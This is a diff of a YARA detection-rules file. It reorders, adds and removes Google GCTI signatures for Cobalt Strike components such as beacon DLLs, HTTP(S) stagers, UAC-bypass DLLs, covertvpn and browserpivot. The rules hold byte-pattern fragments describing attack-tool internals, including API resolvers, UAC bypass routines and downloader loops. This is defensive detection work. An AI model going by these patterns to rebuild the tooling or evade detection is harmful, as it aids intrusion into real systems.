 rule GCTI_Cobaltstrike_Resources_Elevate_X64_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_X64_Dll_V4_X
 {
 	meta:
@@ -76714,30 +78081,117 @@ rule GCTI_Cobaltstrike_Resources_Elevate_X64_Dll_V3_0_To_V3_14_And_Sleeve_Elevat
 	condition:
 		$wnd_proc
 }
-rule GCTI_Cobaltstrike_Resources_Xor_Bin__64Bit_V3_12_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Bypassuac_X64_Dll_V3_3_To_V3_14_And_Sleeve_Bypassuac_X64_Dll_V4_0_And_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resource/xor64.bin signature for version 3.12 through 4.x"
+		description = "Cobalt Strike's resources/bypassuac-x64.dll from v3.3 to v3.14 (64-bit version) and sleeve/bypassuac.x64.dll from v4.0 to at least v4.4"
 		author = "gssincla@google.com"
-		id = "5bb465ee-3bbd-5bfe-8b63-1f243de217bc"
+		id = "eef83901-63d9-55a3-b115-03f420416177"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__64bit_v3_12_to_4_x.yara#L17-L38"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_x64_Dll_v3_3_to_v3_14_and_Sleeve_Bypassuac_x64_Dll_v4_0_and_v4_x.yara#L17-L86"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "01dba8783768093b9a34a1ea2a20f72f29fd9f43183f3719873df5827a04b744"
-		logic_hash = "aabaad09408ae292a0bbc678c334f9f54364b4f6b882846072c303bf826fc2da"
+		hash = "9ecf56e9099811c461d592c325c65c4f9f27d947cbdf3b8ef8a98a43e583aecb"
+		logic_hash = "d76e3601f61ae164a8df9048d59d15cd6913e64adb93132244e83f40bf67d86a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$stub58 = {fc e8 ?? ?? ?? ?? [1-32] eb 33 5? 8b ?? 00 4? 83 ?? ?4 8b ?? 00 31 ?? 4? 83 ?? ?4 5? 8b ?? 00 31 ?? 89 ?? 00 31 ?? 4? 83 ?? ?4 83 ?? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? fc 4? 83 ?? f0 ff}
-		$stub59 = {fc e8 ?? ?? ?? ?? [1-32] eb 2e 5? 8b ??    48 83 c? ?4 8b ??    31 ?? 48 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 48 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e9 5?    48 83 ec ?8 ff e? e8 cd ff ff ff}
-		$stub63 = {fc e8 ?? ?? ?? ?? [1-32] eb 32 5d 8b ?? ?? 48 83 c5 ?4 8b ?? ?? 31 ?? 48 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 48 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e7 5?    48 83 ec ?8 ff e? e8 c9 ff ff ff}
+		$deleteFileCOM = {
+			48 8B [5]
+			45 33 ??
+			48 8B ??
+			FF 90 90 00 00 00
+			85 C0
+			75 ??
+			48 8B [5]
+			48 8B ??
+			FF 92 A8 00 00 00
+			85 C0
+		}
+		$copyFileCOM = {
+			48 8B [5]
+			4C 8B [5]
+			48 8B [5]
+			48 8B ??
+			4C 8B ??
+			48 89 [3]
+			FF 90 80 00 00 00
+			85 C0
+			0F 85 [4]
+			48 8B [5]
+			48 8B 11
+			FF 92 A8 00 00 00
+		}
 
 	condition:
-		any of them
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Covertvpn_Injector_Exe_V1_44_To_V2_0_49
+{
+	meta:
+		description = "Cobalt Strike's resources/covertvpn-injector.exe signature for version v1.44 to v2.0.49"
+		author = "gssincla@google.com"
+		id = "48485ae2-1d99-5fa8-b8e8-0047e92ef447"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_injector_Exe_v1_44_to_v2_0_49.yara#L17-L116"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "d741751520f46602f5a57d1ed49feaa5789115aeeba7fa4fc7cbb534ee335462"
+		logic_hash = "119602efe6243d8c0dc7b8f4468eb9b3be292620920f69dc8a560f900ac7f622"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$dropComponentsAndActivateDriver_prologue = {
+			C7 04 24 [4]
+			E8 [4]
+			83 EC 04
+			C7 44 24 04 [4]
+			89 04 24
+			E8 59 14 00 00
+			83 EC 08
+			89 45 ??
+			83 7D ?? 00
+			74 ??
+			E8 [4]
+			8D [2]
+			89 [3]
+			89 04 24
+		}
+		$dropFile = {
+			C7 44 24 04 00 00 00 00
+			8B [2]
+			89 ?? 24
+			E8 [4]
+			83 F8 FF
+			74 ??
+			8B [2]
+			89 ?? 24 04
+			C7 04 24 [4]
+			E8 [4]
+			E9 [4]
+			C7 44 24 18 00 00 00 00
+			C7 44 24 14 80 01 00 00
+			C7 44 24 10 02 00 00 00
+			C7 44 24 0C 00 00 00 00
+			C7 44 24 08 05 00 00 00
+			C7 44 24 04 00 00 00 40
+			8B [2]
+			89 04 24
+			E8 [4]
+			83 EC 1C
+			89 45 ??
+		}
+		$nfp = "npf.sys" nocase
+		$wpcap = "wpcap.dll" nocase
+
+	condition:
+		all of them
 }
 rule GCTI_Cobaltstrike_Resources_Artifact32_And_Resources_Dropper_V1_49_To_V3_14
 {
@@ -76760,158 +78214,336 @@ rule GCTI_Cobaltstrike_Resources_Artifact32_And_Resources_Dropper_V1_49_To_V3_14
 		$payloadDecoder = { 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 18 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 03 [2] 0F B6 00 31 ?? 88 ?? 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 12 }
 
 	condition:
-		any of them
+		any of them
+}
+rule GCTI_Cobaltstrike_Resources_Artifact32_V3_1_And_V3_2
+{
+	meta:
+		description = "Cobalt Strike's resources/artifact32{.dll,.exe,svc.exe,big.exe,big.dll,bigsvc.exe} and resources/artifact32uac(alt).dll signature for versions 3.1 and 3.2"
+		author = "gssincla@google.com"
+		id = "4fff7f42-9f50-5945-8ec0-2438ac5c7000"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L34-L60"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "4f14bcd7803a8e22e81e74d6061d0df9e8bac7f96f1213d062a29a8523ae4624"
+		logic_hash = "7a0d33d0260c762b4aa67e4084d7474338c60aa684fd3e622614745d90350da8"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 ?? 8A ?? 4? 88 }
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Artifact32_V3_14_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0"
+		author = "gssincla@google.com"
+		id = "8a010305-dce5-55f4-b2dd-a736721efe22"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L62-L89"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719"
+		logic_hash = "fc5c353c568e33df80fa5bab14d11112ca211e269043b83dba8b7d1a6a008a7b"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$pushFmtStr = {	C7 [3] 5C 00 00 00 C7 [3] 65 00 00 00 C7 [3] 70 00 00 00 C7 [3] 69 00 00 00 C7 [3] 70 00 00 00 F7 F1 C7 [3] 5C 00 00 00  C7 [3] 2E 00 00 00 C7 [3] 5C 00 00 00 }
+		$fmtStr = "%c%c%c%c%c%c%c%c%cMSSE-%d-server"
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike__Resources_Browserpivot_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_Dll_V4_0_To_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/browserpivot.bin from v1.48 to v3.14 and sleeve/browserpivot.dll from v4.0 to at least v4.4"
+		author = "gssincla@google.com"
+		id = "55086544-6684-526b-914f-505a562be458"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_Dll_v4_0_to_v4_x.yara#L17-L60"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "12af9f5a7e9bfc49c82a33d38437e2f3f601639afbcdc9be264d3a8d84fd5539"
+		logic_hash = "416554d31c105fd96aeaef508847efe2889590909c8d0025e3862e5b24078131"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$socket_recv = {
+			FF [1-5]
+			83 ?? FF
+			74 ??
+			85 C0
+			(74 | 76) ??
+			03 ??
+			83 ?? 02
+			72 ??
+			80 ?? 3E FF 0A
+			75 ??
+			80 ?? 3E FE 0D
+		}
+		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
+
+	condition:
+		all of them
+}
+rule GCTI_Cobaltstrike_Resources_Httpsstager64_Bin_V3_2_Through_V4_X
+{
+	meta:
+		description = "Cobalt Strike's resources/httpsstager64.bin signature for versions v3.2 to v4.x"
+		author = "gssincla@google.com"
+		id = "c16e73fc-484a-5f7e-8127-d85a0254d842"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara#L17-L90"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "109b8c55816ddc0defff360c93e8a07019ac812dd1a42209ea7e95ba79b5a573"
+		logic_hash = "4889a23c1f2780044b9fb2a0207676d57e82e6c1275614b684a5a9cbe984b761"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$apiLocator = {
+			48 [2]
+			AC
+			41 [2] 0D
+			41 [2]
+			38 ??
+			75 ??
+			4C [4]
+			45 [2]
+			75 ??
+			5?
+			44 [2] 24
+			49 [2]
+			66 [4]
+			44 [2] 1C
+			49 [2]
+			41 [3]
+			48
+		}
+		$InternetSetOptionA = {
+			BA 1F 00 00 00
+			6A 00
+			68 80 33 00 00
+			49 [2]
+			41 ?? 04 00 00 00
+			41 ?? 75 46 9E 86
+		}
+
+	condition:
+		$apiLocator and $InternetSetOptionA
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32_V3_1_And_V3_2
+rule GCTI_Cobaltstrike_Resources_Bypassuactoken_X64_Dll_V3_11_To_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32{.dll,.exe,svc.exe,big.exe,big.dll,bigsvc.exe} and resources/artifact32uac(alt).dll signature for versions 3.1 and 3.2"
+		description = "Cobalt Strike's resources/bypassuactoken.x64.dll from v3.11 to v3.14 (64-bit version)"
 		author = "gssincla@google.com"
-		id = "4fff7f42-9f50-5945-8ec0-2438ac5c7000"
+		id = "c89befcd-a622-5947-9ce3-a6031901a45a"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L34-L60"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_x64_Dll_v3_11_to_v3_14.yara#L17-L118"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "4f14bcd7803a8e22e81e74d6061d0df9e8bac7f96f1213d062a29a8523ae4624"
-		logic_hash = "7a0d33d0260c762b4aa67e4084d7474338c60aa684fd3e622614745d90350da8"
+		hash = "853068822bbc6b1305b2a9780cf1034f5d9d7127001351a6917f9dbb42f30d67"
+		logic_hash = "adfd212f2e470f666ab8a2168e976c11d3032c31dab7cf56963dae5fc0f6c5f9"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 ?? 8A ?? 4? 88 }
+		$isHighIntegrityProcess = {
+			83 ?? 7A
+			75 ??
+			8B [3]
+			33 ??
+			FF 15 [4]
+			44 [4]
+			8D [2]
+			48 8B ??
+			48 8D [3]
+			48 8B ??
+			4C 8B ??
+			48 89 [3]
+			FF 15 [4]
+			85 C0
+			74 ??
+			48 8B ??
+			FF 15 [4]
+			8D [2]
+			8A ??
+			40 [2]
+			0F B6 D1
+			48 8B 0F
+			FF 15 [4]
+			81 ?? 00 30 00 00
+		}
+		$executeTaskmgr = {
+			44 8D ?? 70
+			48 8D [3]
+			E8 [4]
+			83 [3] 00
+			48 8D [5]
+			0F 57 ??
+			66 0F 7F [3]
+			48 89 [3]
+			48 8D [5]
+			48 8D [3]
+			C7 [3] 70 00 00 00
+			C7 [3] 40 00 00 00
+			48 89 [3]
+			FF 15
+		}
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32_V3_14_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0"
+		description = "Cobalt Strike's resources/bind64.bin signature for versions v2.5 to v4.x"
 		author = "gssincla@google.com"
-		id = "8a010305-dce5-55f4-b2dd-a736721efe22"
+		id = "a01e7bc3-40e9-5f87-8fd6-926972be273b"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L62-L89"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind64_Bin_v2_5_through_v4_x.yara#L17-L109"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719"
-		logic_hash = "fc5c353c568e33df80fa5bab14d11112ca211e269043b83dba8b7d1a6a008a7b"
+		hash = "5dd136f5674f66363ea6463fd315e06690d6cb10e3cc516f2d378df63382955d"
+		logic_hash = "ba79abc5cfeaccb94699c0d85c16b2ddf6820bc148c0fd1c9b33c07222e36cb6"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$pushFmtStr = {	C7 [3] 5C 00 00 00 C7 [3] 65 00 00 00 C7 [3] 70 00 00 00 C7 [3] 69 00 00 00 C7 [3] 70 00 00 00 F7 F1 C7 [3] 5C 00 00 00  C7 [3] 2E 00 00 00 C7 [3] 5C 00 00 00 }
-		$fmtStr = "%c%c%c%c%c%c%c%c%cMSSE-%d-server"
+		$apiLocator = {
+			48 [2]
+			AC
+			41 [2] 0D
+			41 [2]
+			38 ??
+			75 ??
+			4C [4]
+			45 [2]
+			75 ??
+			5?
+			44 [2] 24
+			49 [2]
+			66 [4]
+			44 [2] 1C
+			49 [2]
+			41 [3]
+			48
+		}
+		$calls = {
+			41 BA C2 DB 37 67
+			FF D5
+			48 [2]
+			48 [2]
+			41 BA B7 E9 38 FF
+			FF D5
+			4D [2]
+			48 [2]
+			48 [2]
+			41 BA 74 EC 3B E1
+			FF D5
+			48 [2]
+			48 [2]
+			41 BA 75 6E 4D 61
+		}
 
 	condition:
-		all of them
+		$apiLocator and $calls
 }
-rule GCTI_Cobaltstrike_Resources_Browserpivot_X64_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_X64_Dll_V4_0_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Httpstager_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/browserpivot.x64.bin from v1.48 to v3.14 and sleeve/browserpivot.x64.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's resources/httpstager.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "a5dfae85-ff9c-5ca5-9ac0-041c6108a6ed"
+		id = "86109485-c26c-5c51-8d04-dd1add9a8c57"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_x64_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_x64_Dll_v4_0_to_v4_x.yara#L17-L64"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager_Bin_v2_5_through_v4_x.yara#L17-L93"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "0ad32bc4fbf3189e897805cec0acd68326d9c6f714c543bafb9bc40f7ac63f55"
-		logic_hash = "a59f19b6e258b724ed88b4255717d066319ba5fb0838d6c6ed11355e9d9b1c22"
+		hash = "a47569af239af092880751d5e7b68d0d8636d9f678f749056e702c9b063df256"
+		logic_hash = "3baab08b0118e00432f1869ba5daa4fc6383bfc020119bfbb3047a008c33fe72"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$socket_recv = {
-			FF 15 [4]
-			83 ?? FF
-			74 ??
-			85 ??
-			74 ??
-			03 ??
-			83 ?? 02
-			72 ??
-			8D ?? FF
-			80 [2] 0A
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
 			75 ??
-			8D ?? FE
-			80 [2] 0D
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$downloaderLoop = {
+			B? 00 2F 00 00
+			39 ??
+			74 ??
+			31 ??
+			( E9 | EB )
 		}
-		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
 
 	condition:
-		all of them
+		$apiLocator and $downloaderLoop
 }
-rule GCTI_Cobaltstrike_Resources_Covertvpn_Dll_V2_1_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Xor_Bin__64Bit_V3_12_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/covertvpn.dll signature for version v2.2 to v4.4"
+		description = "Cobalt Strike's resource/xor64.bin signature for version 3.12 through 4.x"
 		author = "gssincla@google.com"
-		id = "a65b855c-5703-5b9f-bb57-da8ebf898f9b"
+		id = "5bb465ee-3bbd-5bfe-8b63-1f243de217bc"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_Dll_v2_1_to_v4_x.yara#L17-L120"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__64bit_v3_12_to_4_x.yara#L17-L38"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "0a452a94d53e54b1df6ba02bc2f02e06d57153aad111171a94ec65c910d22dcf"
-		logic_hash = "1f6e4254fdfd4f9b13c2000333aabbb7da90d2df7ee1b12faa6ea3c066351468"
+		hash = "01dba8783768093b9a34a1ea2a20f72f29fd9f43183f3719873df5827a04b744"
+		logic_hash = "aabaad09408ae292a0bbc678c334f9f54364b4f6b882846072c303bf826fc2da"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$dropComponentsAndActivateDriver_prologue = {
-			5?
-			68 [4]
-			68 [4]
-			C7 [3-5] 00 00 00 00
-			FF 15 [4]
-			50
-			FF 15 [4]
-			8B ??
-			85 ??
-			74 ??
-			8D [3-5]
-			5?
-			FF 15 [4]
-			50
-		}
-		$dropFile = {
-			6A 00
-			5?
-			E8 [4]
-			83 C4 08
-			83 F8 FF
-			74 ??
-			5?
-			[0-5]
-			E8 [4]
-			83 C4 ??
-			[0-2]
-			6A 00
-			68 80 01 00 00
-			6A 02
-			6A 00
-			6A 05
-			68 00 00 00 40
-			5?
-			FF 15 [4]
-			8B ??
-			83 ?? FF
-			75 ??
-			FF 15 [4]
-			5?
-		}
-		$nfp = "npf.sys" nocase
-		$wpcap = "wpcap.dll" nocase
+		$stub58 = {fc e8 ?? ?? ?? ?? [1-32] eb 33 5? 8b ?? 00 4? 83 ?? ?4 8b ?? 00 31 ?? 4? 83 ?? ?4 5? 8b ?? 00 31 ?? 89 ?? 00 31 ?? 4? 83 ?? ?4 83 ?? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? fc 4? 83 ?? f0 ff}
+		$stub59 = {fc e8 ?? ?? ?? ?? [1-32] eb 2e 5? 8b ??    48 83 c? ?4 8b ??    31 ?? 48 83 c? ?4 5? 8b ??    31 ?? 89 ??    31 ?? 48 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e9 5?    48 83 ec ?8 ff e? e8 cd ff ff ff}
+		$stub63 = {fc e8 ?? ?? ?? ?? [1-32] eb 32 5d 8b ?? ?? 48 83 c5 ?4 8b ?? ?? 31 ?? 48 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 48 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e7 5?    48 83 ec ?8 ff e? e8 c9 ff ff ff}
 
 	condition:
-		all of them
+		any of them
 }
 rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_44
 {
@@ -77580,1567 +79212,498 @@ rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_7_Suspected
 		date = "2022-11-18"
 		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L969-L1002"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "da9e91b3d8df3d53425dd298778782be3bdcda40037bd5c92928395153160549"
-		logic_hash = "297ff7c3acfe6f9676dc6c265c548f017f39ccc5217617344e3bccc704ac4c78"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 53 56 48 57 8B F2 83 F8 67 0F 87 5E 03 00 00  }
-		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_2
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.2"
-		author = "gssincla@google.com"
-		id = "61188243-0b90-5bff-bcc8-50f10ed941f6"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1029-L1068"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5993a027f301f37f3236551e6ded520e96872723a91042bfc54775dcb34c94a1"
-		logic_hash = "3803aaac537aec0b188870177e510a3789a71c19be576569b59aa146b2ba62c5"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 4C 8D 05 9F F8 FF FF 8B D3 48 8B CF E8 05 1A 00 00
-                     EB 0A 8B D3 48 8B CF E8 41 21 00 00 48 8B 5C 24 30
-                     48 83 C4 20 }
-		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_3
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.3"
-		author = "gssincla@google.com"
-		id = "fb96ecff-809e-5704-974e-a2d8ef022daa"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1070-L1109"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "7b00721efeff6ed94ab108477d57b03022692e288cc5814feb5e9d83e3788580"
-		logic_hash = "514d491b8066ed7127ebb152a27efbe65e1121da3b5460afe6987920a91f2863"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D3 48 8B CF E8 89 66 00 00 E9 23 FB FF FF
-                     41 B8 01 00 00 00 E9 F3 FD FF FF 48 8D 0D 2A F8 FF FF
-                     E8 8D 2B 00 00 48 8B 5C 24 30 48 83 C4 20 }
-		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_4
-{
-	meta:
-		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.4"
-		author = "gssincla@google.com"
-		id = "97ef152c-86c7-513c-a881-e7d594d38dcf"
-		date = "2022-11-18"
-		modified = "2023-12-04"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1111-L1148"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "5a4d48c2eda8cda79dc130f8306699c8203e026533ce5691bf90363473733bf0"
-		logic_hash = "65aa42265133038f6f568c021c0228440e84e236829af50796a73f6923f46395"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$version_sig = { 8B D3 48 8B CF E8 56 6F 00 00 E9 17 FB FF FF
-                     41 B8 01 00 00 00 8B D3 48 8B CF E8 41 4D 00 00
